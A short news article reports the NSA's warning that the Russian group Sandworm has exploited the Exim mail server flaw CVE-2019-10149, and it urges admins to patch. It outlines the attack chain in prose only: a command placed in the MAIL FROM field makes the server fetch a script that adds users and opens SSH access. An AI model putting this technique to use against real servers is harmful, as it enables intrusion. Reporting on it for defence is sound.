NSA warned that a Russian cyber-espionage group named Sandworm is said to be exploiting Exim mail servers since mid-2019. These attacks can give the root access and plant backdoors for future exploits say NSA. Though the patch for this vulnerability was rolled last year, there are still millions of servers exposed to this attack.
Millions of Internet Facing Mail Servers
Exim is a free Mail Transfer Agent (MTA) that runs on Unix-like OS. It was used by millions of administrators from both public and private organizations. In August 2019, researchers have disclosed a critical vulnerability in Exim servers called The Return of WIZard (CVE-2019-10149). This allows hackers to execute commands to the roots of unlatched servers by sending a malicious script.
National Security Agency (NSA) said the GRU Main Center for Special Technologies (GTsST) hackers of Unit 74455, who’re attributed to being Russian state-backed group, have been exploiting this flaw since its disclosure last year. Microsoft has warned system administrators about this vulnerability and advised to update for a patch released on June 5th 2019. Yet, there are millions of servers still exposed to this vulnerability as said by BleepingComputer.
Consequences and Workarounds
According to this, the hacker would send a maliciously crafted email with a command in MAIL FROM field of an SMTP message. Upon receiving, it will then download a shell script procured from the hacker’s domain, which
- Adds privileged users (like hackers)
- Update SSH configurations to enable remote access.
- Disable network security settings, and
- Execute an additional script to enable follow-on exploitation.
Researchers have already rolled the patch for this vulnerability and urges admins to update immediately. Server admins can download the latest 4.93 version through their Linux distribution’s package manager or via the Exim website. Read more about the NSA’s advisory and indicators of compromise to safeguard yourselves.